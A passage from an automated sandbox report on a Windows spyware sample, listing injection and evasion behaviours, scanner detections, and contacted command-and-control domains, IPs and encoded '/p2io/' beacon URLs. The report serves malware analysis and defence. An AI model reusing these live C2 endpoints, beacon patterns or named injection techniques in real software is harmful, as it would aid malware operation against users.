hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 39 cleanxcare.com 78.31.67.91, 49729, 80 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 18->39 41 www.hazard-protection.com 148.59.128.71, 49731, 80 GREENHOUSE-WYUS Canada 18->41 43 7 other IPs or domains 18->43 53 System process connects to network (likely due to code injection or exploit) 18->53 22 colorcpl.exe 18->22         started        25 autochk.exe 18->25         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            UOMp9cDcqZ.exe16%VirustotalBrowse
            UOMp9cDcqZ.exe26%MetadefenderBrowse
            UOMp9cDcqZ.exe50%ReversingLabsByteCode-MSIL.Spyware.Negasteal
            UOMp9cDcqZ.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.0.UOMp9cDcqZ.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            2.2.UOMp9cDcqZ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            www.dmgt4m2g8y2uh.net0%VirustotalBrowse
            www.hazard-protection.com2%VirustotalBrowse
            www.yunlimall.com1%VirustotalBrowse
            thesoulrevitalist.com1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.sandoll.co.krN.TTFv0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cr0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/jp//0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.founder.c0%URL Reputationsafe
            http://www.founder.c0%URL Reputationsafe
            http://www.founder.c0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.thesoulrevitalist.com/p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP0%Avira URL Cloudsafe
            http://www.dmgt4m2g8y2uh.net/p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/liquI0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            www.adultpeace.com/p2io/0%URL Reputationsafe
            www.adultpeace.com/p2io/0%URL Reputationsafe
            www.adultpeace.com/p2io/0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/40%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/40%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/40%URL Reputationsafe
            http://www.hazard-protection.com/p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/&0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/&0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/&0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.fontbureau.comuev0%Avira URL Cloudsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sajatypeworks.coms0%Avira URL Cloudsafe
            http://www.yunlimall.com/p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP0%Avira URL Cloudsafe
            http://www.tiro.comn0%URL Reputationsafe
            http://www.tiro.comn0%URL Reputationsafe
            http://www.tiro.comn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn.0%URL Reputationsafe
            http://www.founder.com.cn/cn.0%URL Reputationsafe
            http://www.founder.com.cn/cn.0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/z0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/z0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/z0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.cleanxcare.com/p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP0%Avira URL Cloudsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.sajatypeworks.coma-d0%URL Reputationsafe
            http://www.sajatypeworks.coma-d0%URL Reputationsafe
            http://www.sajatypeworks.coma-d0%URL Reputationsafe
            http://www.founder.com.cn/cn/MI0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.dmgt4m2g8y2uh.net
            		103.120.12.113
            		truetrueunknown
            www.hazard-protection.com
            		148.59.128.71
            		truetrueunknown
            www.yunlimall.com
            		142.111.47.2
            		truetrueunknown
            thesoulrevitalist.com
            		34.102.136.180
            		truefalseunknown
            cleanxcare.com
            		78.31.67.91
            		truetrue
              		unknown
              www.newmopeds.com
              		52.58.78.16
              		truetrue
                		unknown
                www.trendbold.com
                		64.190.62.111
                		truefalse
                  		unknown
                  www.thesoulrevitalist.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.jonathan-mandt.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.cleanxcare.com
                      		unknown
                      		unknowntrue
                        		unknown
                        clientconfig.passport.net
                        		unknown
                        		unknowntrue
                          		unknown
                          www.zgcbw.net
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.thesoulrevitalist.com/p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdPfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.dmgt4m2g8y2uh.net/p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdPtrue
                            • Avira URL Cloud: safe
                            		unknown
                            www.adultpeace.com/p2io/true
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		low
                            http://www.hazard-protection.com/p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdPtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.yunlimall.com/p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdPtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.cleanxcare.com/p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdPtrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.fontbureau.com/designersGUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sandoll.co.krN.TTFvUOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers?UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/crUOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/jp//UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.tiro.comexplorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.cUOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.goodfont.co.krUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/liquIUOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssUOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designersUUOMp9cDcqZ.exe, 00000001.00000003.233796502.0000000005B09000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.sajatypeworks.comUOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cn/cTheUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://fontfabrik.comUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/4UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fonts.comUOMp9cDcqZ.exe, 00000001.00000003.228190439.0000000005B1B000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krUOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/&UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUOMp9cDcqZ.exe, 00000001.00000002.248963538.0000000002B61000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comuevUOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sakkal.comUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.apache.org/licenses/LICENSE-2.0UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.sajatypeworks.comsUOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.tiro.comnUOMp9cDcqZ.exe, 00000001.00000003.228445833.0000000005B1B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/jp/UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comlUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cn/UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn.UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/zUOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cnUOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.commUOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sajatypeworks.coma-dUOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/MIUOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      52.58.78.16
                                                      		www.newmopeds.comUnited States
                                                      		16509AMAZON-02UStrue
                                                      142.111.47.2
                                                      		www.yunlimall.comUnited States
                                                      		18779EGIHOSTINGUStrue
                                                      103.120.12.113
                                                      		www.dmgt4m2g8y2uh.netPhilippines
                                                      		17941BIT-ISLEEquinixJpapanEnterpriseKKJPtrue
                                                      34.102.136.180
                                                      		thesoulrevitalist.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      148.59.128.71
                                                      		www.hazard-protection.comCanada
                                                      		33561GREENHOUSE-WYUStrue
                                                      78.31.67.91
                                                      		cleanxcare.comGermany
                                                      		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue

                                                      General Information

                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                      Analysis ID:433343
                                                      Start date:11.06.2021
                                                      Start time:16:55:29
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 21s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:UOMp9cDcqZ (renamed file extension from none to exe)
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:26
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@8/1@10/6
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 15.5% (good quality ratio 13.8%)
                                                      • Quality average: 71.9%
                                                      • Quality standard deviation: 32.1%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 93.184.220.29, 88.221.62.148, 92.123.150.225, 40.88.32.150, 20.82.210.154, 204.79.197.200, 13.107.21.200, 104.43.193.48, 168.61.161.212, 92.122.145.220, 184.30.20.56, 2.20.142.210, 2.20.142.209, 20.50.102.62, 92.122.213.194, 92.122.213.247, 20.54.26.129, 20.82.209.183
                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, go.microsoft.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      16:56:27API Interceptor1x Sleep call for process: UOMp9cDcqZ.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      52.58.78.16swift_08_06_21.exeGet hashmaliciousBrowse
                                                      • www.xconcycles.com/uecu/?V0Gp=5pzuVFt7Rn64C1ufTef98lpbvOeME/ckDBpxS3lZ5aVTfjqbtBrPHTtqgRIurTTxPO9K&o0GLn=HL3dvbPH7lYXNt
                                                      LkvumUsaQX.exeGet hashmaliciousBrowse
                                                      • www.aideliveryrobot.com/p2io/?7ntDA=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCXeRXe31/VGONAQ+A==&p48x=MN6xDxf80FMxbj4
                                                      rtgs_pdf.exeGet hashmaliciousBrowse
                                                      • www.xconcycles.com/uecu/?6lP4=KX-DbxrPVhL&4h=5pzuVFt7Rn64C1ufTef98lpbvOeME/ckDBpxS3lZ5aVTfjqbtBrPHTtqgRIurTTxPO9K
                                                      Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                      • www.disaffiliate.com/grb/?rZ_PWR=AL0hw0R0lbS&4hOh3f=NehcgTWQeq/VsRekg315ejtM4YSiPjpCyjRjkSiogCjQ7wpOltERHBcGfdwwYjeQez9c
                                                      FORM B.xlsxGet hashmaliciousBrowse
                                                      • www.newmopeds.com/p2io/?zv7Dz=bSK1RxPMHjVQe9mhMJ2LeA3okZHmhG3V4GBmTatllgIVkFsFULHDN3EeY50sHAiR0AoDRA==&9r=4hGhubGX5Ne8OP9p
                                                      17jLieeOPx.exeGet hashmaliciousBrowse
                                                      • www.aideliveryrobot.com/p2io/?D48=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJB7kSWyM2I0X&2dYX6=1b-D6VYx
                                                      U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                      • www.newmopeds.com/p2io/?z8I4HhO=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbcYQcgWi7B9z&6lyPdB=iR-deNZP3
                                                      PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                      • www.cdpp.net/owws/?y8z=YdU7NBQPIrSfc/SzO5tJKQOoe+3z8mTqUhwt2UaqVEIrn8N3NQsycVd80OFfgS2GNrN2&UDKPKv=04i8JpzhsHVX
                                                      CARGO ARRIVAL NOTICE-MEDICOM AWB.exeGet hashmaliciousBrowse
                                                      • www.sanacolitademarijuana.com/u8nw/?HpR=9bHYKsyT0auyBBl4ZenxQUebR4YwlP18dAkCPCATYDDxMs1xZZCxfJgyFNCzTUiCnFtm&fJBXA=4huh6VQHqvw4
                                                      ARKEMA CHANGSHU__BEARING PO_20210602092508_4957872385078390-pdf.exeGet hashmaliciousBrowse
